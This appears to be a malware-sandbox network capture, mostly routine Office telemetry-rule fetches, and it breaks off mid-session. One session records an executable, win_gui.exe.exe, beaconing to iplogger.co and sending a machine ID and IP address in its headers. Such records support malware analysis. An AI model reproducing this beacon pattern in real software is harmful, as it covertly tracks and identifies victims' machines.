                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:12 UTC | 192 | OUT | GET /rules/rule703400v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1388
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                ETag: "0x8DC582BDBD9126E"
                                x-ms-request-id: cf1b24c6-801e-00a0-09d5-432196000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968cpnpfhC1EWR3afc00000015r000000000u3tx
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC | 1388 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                125 | 192.168.2.5 | 50092 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:12 UTC | 192 | OUT | GET /rules/rule702300v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                ETag: "0x8DC582BDC13EFEF"
                                x-ms-request-id: f4a7b183-b01e-0098-27d5-43cead000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f784596886s2bhC1EWR743w000000167000000000hfx1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC | 1362 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                126 | 192.168.2.5 | 50093 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:12 UTC | 192 | OUT | GET /rules/rule703401v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1425
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                ETag: "0x8DC582BE6BD89A1"
                                x-ms-request-id: 68e9c15b-c01e-002b-1eed-446e00000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968frfdmhC1EWRxxbw00000016bg0000000016kv
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC | 1425 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                127 | 192.168.2.5 | 50095 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:12 UTC | 192 | OUT | GET /rules/rule702501v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1415
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                ETag: "0x8DC582BE7C66E85"
                                x-ms-request-id: e7ccb915-001e-0014-50a1-425151000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968nxc96hC1EWRspw800000015ug00000000uquc
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC | 1415 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                128 | 192.168.2.5 | 50096 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:12 UTC | 192 | OUT | GET /rules/rule702500v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:12 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:12 GMT
                                Content-Type: text/xml
                                Content-Length: 1378
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                ETag: "0x8DC582BDB813B3F"
                                x-ms-request-id: 5818dd1d-501e-0035-4638-40c923000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165212Z-174f7845968jrjrxhC1EWRmmrs00000016d0000000005s8h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:12 UTC | 1378 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                129 | 192.168.2.5 | 50097 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:14 UTC | 192 | OUT | GET /rules/rule700500v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:14 GMT
                                Content-Type: text/xml
                                Content-Length: 1368
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE51CE7B3"
                                x-ms-request-id: af0b01d9-401e-0035-6c5f-4082d8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165214Z-174f7845968nxc96hC1EWRspw800000015zg0000000098f3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC | 1368 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                130 | 192.168.2.5 | 50098 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:14 UTC | 192 | OUT | GET /rules/rule700501v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1405
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                ETag: "0x8DC582BE89A8F82"
                                x-ms-request-id: 9546ee6f-d01e-0014-4f91-3fed58000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968xr5c2hC1EWRd0hn0000000r50000000001tmy
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC | 1405 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                131 | 192.168.2.5 | 50100 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:15 UTC | 192 | OUT | GET /rules/rule701351v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1407
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                ETag: "0x8DC582BE687B46A"
                                x-ms-request-id: 1402e90e-d01e-0049-106c-43e7dc000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968cdxdrhC1EWRg0en000000167g0000000051aq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC | 1407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                132 | 192.168.2.5 | 50099 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:15 UTC | 192 | OUT | GET /rules/rule702551v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1415
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                ETag: "0x8DC582BDCE9703A"
                                x-ms-request-id: 13d7d736-e01e-00aa-3cf1-41ceda000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968xlwnmhC1EWR0sv800000016300000000077kf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC | 1415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                133 | 192.168.2.5 | 50101 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:15 UTC | 192 | OUT | GET /rules/rule702550v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:15 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:15 GMT
                                Content-Type: text/xml
                                Content-Length: 1378
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE584C214"
                                x-ms-request-id: a48bf5db-301e-001f-62e1-41aa3a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165215Z-174f7845968swgbqhC1EWRmnb400000016d0000000008kqh
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:15 UTC | 1378 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                134 | 192.168.2.5 | 50102 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:17 UTC | 192 | OUT | GET /rules/rule701350v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1370
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                ETag: "0x8DC582BDE62E0AB"
                                x-ms-request-id: 3a28b270-401e-00ac-75b5-430a97000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968vqt9xhC1EWRgten00000016ag000000004hd7
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC | 1370 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                135 | 192.168.2.5 | 50103 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:17 UTC | 192 | OUT | GET /rules/rule702151v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1397
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE156D2EE"
                                x-ms-request-id: 355539d4-e01e-0099-70f9-44da8a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968glpgnhC1EWR7uec000000167g00000000ypbe
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                136 | 192.168.2.5 | 50104 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:17 UTC | 192 | OUT | GET /rules/rule702150v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1360
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                ETag: "0x8DC582BEDC8193E"
                                x-ms-request-id: e09bbfae-501e-00a0-6a93-439d9f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968xlwnmhC1EWR0sv800000016300000000077r6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                137 | 192.168.2.5 | 50105 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:17 UTC | 192 | OUT | GET /rules/rule703001v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1406
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB16F27E"
                                x-ms-request-id: b6aee436-d01e-0028-0d5a-437896000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968frfdmhC1EWRxxbw000000165000000000skw6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC | 1406 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                138 | 192.168.2.5 | 50107 | 172.67.167.249 | 443 | 1864 | C:\Users\user\Desktop\win_gui.exe.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:17 UTC | 195 | OUT | GET /155qJ4.torrent HTTP/1.1
                                Referer: END
                                User-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322
                                Host: iplogger.co
                                Cache-Control: no-cache
                                Cookie: 55593078137264100=3; clhf03028ja=8.46.123.228
                                2024-12-03 16:52:18 UTC | 1092 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: image/png
                                Transfer-Encoding: chunked
                                Connection: close
                                memory: 0.41208648681640625
                                expires: Tue, 03 Dec 2024 16:52:17 +0000
                                Cache-Control: no-store, no-cache, must-revalidate
                                strict-transport-security: max-age=604800
                                strict-transport-security: max-age=31536000
                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                x-frame-options: SAMEORIGIN
                                CF-Cache-Status: BYPASS
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8zxEyyD77T4rpTUdhcw73ovUxlOa4GR7UinVfLN6jclj9akZQt0D090li45nfz5%2F7cDx%2Fm6QOCkzldGotDzMRafhRlqW5sFJBiJIrzUAeqTTRnv%2B3%2BQhHJV%2B%2BRQXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ec510fbca397277-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=43584&min_rtt=19920&rtt_var=23593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=833&delivery_rate=146586&cwnd=225&unsent_bytes=0&cid=26c1293dbf506db2&ts=583&x=0"
                                2024-12-03 16:52:18 UTC | 122 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                2024-12-03 16:52:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                139 | 192.168.2.5 | 50106 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:17 UTC | 192 | OUT | GET /rules/rule703000v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:18 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:18 GMT
                                Content-Type: text/xml
                                Content-Length: 1369
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                ETag: "0x8DC582BE32FE1A2"
                                x-ms-request-id: 06ed9036-e01e-0071-2c24-4408e7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165218Z-174f78459684bddphC1EWRbht400000015wg00000000n5y4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:18 UTC | 1369 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                140 | 192.168.2.5 | 50108 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:19 UTC | 192 | OUT | GET /rules/rule700751v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:19 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:19 GMT
                                Content-Type: text/xml
                                Content-Length: 1414
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BE03B051D"
                                x-ms-request-id: 252842b6-401e-005b-3ea4-439c0c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165219Z-174f7845968vqt9xhC1EWRgten000000168000000000dvu5
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:19 UTC | 1414 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                141 | 192.168.2.5 | 50109 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:19 UTC | 192 | OUT | GET /rules/rule700750v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:19 GMT
                                Content-Type: text/xml
                                Content-Length: 1377
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                ETag: "0x8DC582BEAFF0125"
                                x-ms-request-id: e94d6c12-a01e-0032-5d08-451949000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165219Z-174f7845968cs2nkhC1EWR2tq000000001xg0000000098ke
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC | 1377 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                142 | 192.168.2.5 | 50111 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:19 UTC | 192 | OUT | GET /rules/rule700150v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:19 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE54CA33F"
                                x-ms-request-id: 435fa678-901e-00ac-1f61-43b69e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165219Z-174f7845968jrjrxhC1EWRmmrs000000168g00000000pddb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                143 | 192.168.2.5 | 50110 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:19 UTC | 192 | OUT | GET /rules/rule700151v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
